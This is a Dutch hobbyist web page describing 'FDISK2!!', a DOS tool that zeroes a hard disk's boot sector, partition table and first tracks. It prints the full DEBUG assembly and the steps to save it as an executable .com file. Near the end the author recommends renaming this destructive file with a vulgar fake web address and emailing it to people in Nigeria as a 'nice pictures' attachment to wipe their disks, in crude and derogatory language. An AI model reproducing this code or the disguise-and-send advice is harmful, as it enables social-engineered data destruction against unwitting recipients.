Walter's eigen virus

Walter's bootsector virus

Toch een handige utility, uit de oude doos!

Wat is dit voor toepassing? Dat is voor het weghalen van ongewenste bootpartities en TEVENS !!! de eerste 2 disk sporen wissen in gerecycleerde hard disks.
Dat is dus ook de eventuele HD-boot software NA de bootsector op het eerste spoor, normaal is dit leeg. Hier kan een virus zich echter ook verstoppen.
Zoals:

EZ-drive (N-Ghost werkt na EZ gebruik niet meer, ook niet na herpartitioneren en formatteren!!),
extended HFS partities van UNIX,
OS2 boot of,
Novell server,
of van een Apple.
Deze extra boot software op track 00 krijg je niet meer weg met de opties in FDISK of met FDISK /mbr.
Of wanneer een zeer recente Linux of Win7 of 8 of zelfs een Win10 het vertikt om te (her-)installeren van CD of via LAN boot. (Exit met een "onbekende" error crash)

De utility is genaamd: FDISK2!!, verstopt in een Windows98SE NL DOS virtuele opstart floppy image van 2.88 MB waaraan FDISK2!! - de bootsector en ruime partitie killer - is toegevoegd.
Beschikbaar als "brandbaar" CDROM image bestand.
FDISK2!! staat NIET uitgepakt op deze CD in het standaard "zichtbare" gedeelte (partitie 2), alleen als ZIP.
Veel te link!
Alleen NA CD booten van deze W98SE NL als DOS opstart programma met DOS6 menu pas zichtbaar op de bootpartitie van de CD, die partitie heet dan toepasselijk A: drive = deze CD.
De oude W98 opvul software is na booten meestal bereikbaar op de X: drive, als de dummy driver in de CONFIG.SYS werkt.

Er vindt niets automatisch plaats, het commando FDISK2!! MOET met de hand ingetypt worden.
Dit is versie 2 met een veel groter wis bereik. De EZ-update (na Norton/Symantec Ghost errors).
ER WORDEN GEEN VRAGEN GESTELD BIJ STARTEN VAN DE COM FILE IN PROMPT MODE!!
NA STARTEN IS ALLES WEG, HD WEER LEEG.

Gebruik een speciale test PC met ALLEEN de test harddisk er aan gekoppeld.
Hieronder staat HOE het gemaakt is door mij in DEBUG met assembler (met het boek van Dr. Norton ernaast):

Start DEBUG en eerst een stukje geheugen vullen met nullen (= de data buffer).
F 100 8200 00

DAARNA assembleren vanaf 100 hex in het huidige geheugen segment:
(commentaar na ; hoef je niet in te typen)

a100		;assembler code intypen vanaf adres 100H

mov	ax,0340	;AH=03 = sectoren schrijven,
		;AL=40H = aantal sectors = 64D x 512 = 32768 bytes = 8000H
		;indien korter dan 64 sectoren, dan max per track
mov	bx,0200	;startadres buffer (allemaal 00 tot 8200H )
mov	cx,0001	;CH=00 = track nummer
		;CL=01 = sector nummer
mov	dx,0080	;DH=kopnummer = 00 = 1e spoor
		;DL=80H is drive C:, 81H is drive D:
int	13	; DO-IT = bios interrupt
		;en nog een keer voor de volgende kop, zelfde track
mov	ax,0340	;AH=03 = sectoren schrijven,
		;AL=40H = aantal sectors = 64D x 512 = 32768 bytes = 8000H
		;64 sectoren, of voor zolang als het spoor is op deze track
mov	bx,0200	;startadres buffer (allemaal 00 tot 8200H )
mov	cx,0001	;CH=00 = track nummer
		;CL=01 = sector nummer
mov	dx,0180	;DH=kopnummer, nu 01 = op tweede spoor
		;DL=80H is drive C:, 81H is drive D:
int	13	; DO-IT
int	3	;terug naar prompt mode

nog eens enter

intype controle mbv kommando U100, OK?

ipv laatste "int 3" (terug naar debug prompt met registerinhoud CPU),
is bijv. deze exit (in plaats van int 3 ) ook mogelijk:

          mov    AX,4C00

          int    21       ;(direkt naar de DOS prompt met exitlevel 0)

De versie met INT 21 is eventueel te saven naar floppy als *.com file (geen HD, hi).
Is ook zo te runnen!!!! Nogmaals: Dit is echt levensgevaarlijk!
Werkt nog beter dan een virus, ALLES is dan echt, naar de eeuwige jachtvelden ZONDER herstel mogelijkheid.
Dat gaat verder zo:

         Nfdisk2!!.com
         rcx
         8100
         W

Die *.com file lever ik NIET zelf af. Als je weet waar je mee bezig
bent, dan tik je de data zo zelf in. Normale, aanbevolen methode: in
debug zelf gaat het verder zo:

         g=100      ;voer het uit, knipoogje en weg is-ie

NU: eventueel quit en reboot. Dan: FDISK runnen, in 99% van de gevallen zonder problemen.....
En weer van voren af aan beginnen, met format c: /s.
Of na "leegdrukken" direct met een modernere Windows image op CD of DVD.
Werkt niet?, dan is er iets niet goed ingesteld of de drive is rot.

Moderne virus scanners controleren de machine code in deze COM file
en vinden die ZEEEER verdacht. Dat klopt, want alle data is bij
uitvoering 100% om zeep. Klik dus NIET per ongeluk op dit programma.
Het is met deze versie onmogelijk om de gewiste delen probleemloos te herstellen.
Bootblock is weg, partitie tabel is weg, eventueel ook nog een beginstukje gewist van de FAT.

Als je dit bestand al in een te verzenden email krijgt (iedere virusscanner houdt hem locaal tegen!!!) om op te sturen naar fuckers in Nigeria dan beveel ik de volgende opties aan ( getest, het werkt!!!!), het wordt enige tijd erg stil in Nigeria.

noem het COM bestand geen FDISK2!!.COM maar www.cunt.com
Dit is dus GEEN weblink maar een attachment !
Zet erbij: Click here to see nice pictures.

'Hatsiekiedee'

SUK6, Vernachel ze.....

Een NRG formaat image speciaal voor Nero Burning ROM. Ongeveer 14 MB.
Directe NRG download geblokkeerd door de server, kies de ZIP.
De NRG image speciaal voor Nero Burning ROM, nu in een ZIP. Dan slechts 6 MB.

En een "universele" image in ISO formaat voor ImageBurn. Ongeveer 14 MB.
Directe ISO download geblokkeerd door de server, kies de ZIP.
De "universele" image in ISO formaat, o.a. voor ImageBurn, nu in een ZIP. Dan slechts 6 MB.

Een leuk hoesje (inlay) in PDF erbij?

(Quick Menu)

walter4US.htm
by Walter - PE1ABR - 2024-03-04